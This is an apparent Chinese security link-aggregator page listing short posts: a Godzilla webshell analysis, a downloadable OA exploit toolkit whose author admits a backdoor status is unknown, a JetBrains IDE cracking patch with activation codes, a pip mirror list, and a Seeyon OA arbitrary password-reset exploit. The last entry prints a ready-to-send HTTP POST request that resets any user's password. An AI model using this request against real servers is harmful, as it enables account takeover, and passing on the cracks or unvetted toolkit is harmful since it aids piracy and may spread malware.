Quan

WEB安全 内网安全 终端对抗 威胁情报
WEB安全
哥斯拉代码分析

该文章主要分析了一下哥斯拉的从生成Webshell到连接Webshell的过程

https://mp.weixin.qq.com/s?__biz=Mzg5MjY2NTU4Mw==&mid=2247486141&idx=1&sn=2dca7f77539c2abeeed9ce8b711f068d
WEB安全
红蓝对抗重点OA系统漏洞利用工具v1.5(Hw期间poc)增强版

内附有多个OA的利用工具,后门未知,虚拟机使用。
下载

https://www.redteam.wang
WEB安全
JB家全家桶破解

最近装JB全家桶,祭出我收藏已久的一些东西
破解补丁
Windows先点击uninstall再点击install
之后直接输入这些激活码就行,激活码太长了,我也放到服务器上,自取
phpstorm
idea
goland
pycharm

https://www.redteam.wang
WEB安全
致远OA任意用户密码重置

我实在没想到,2023年居然还有这种漏洞的存在...我啥时候也能挖掘这么个漏洞出来哇...
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: ip:port
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/json
Accept-Encoding: gzip

{"loginName":"XXX321123XXX”,”password":"123456"}

https://mp.weixin.qq.com/s?__biz=Mzk0NDUxMjAzNw==&mid=2247484705&idx=1&sn=b8628900d459830ccb72f283850c4b97
WEB安全
pip3镜像源收集

有时候我们国内pip3 install xxx会非常卡,这个时候就可以使用-i参数去指定pip源。这里收集了几个不错的,以后直接来这个帖子里复制粘贴就完事了
1.清华源
https://pypi.tuna.tsinghua.edu.cn/simple
2.阿里云
https://mirrors.aliyun.com/pypi/simple/

https://zhuanlan.zhihu.com/p/623325525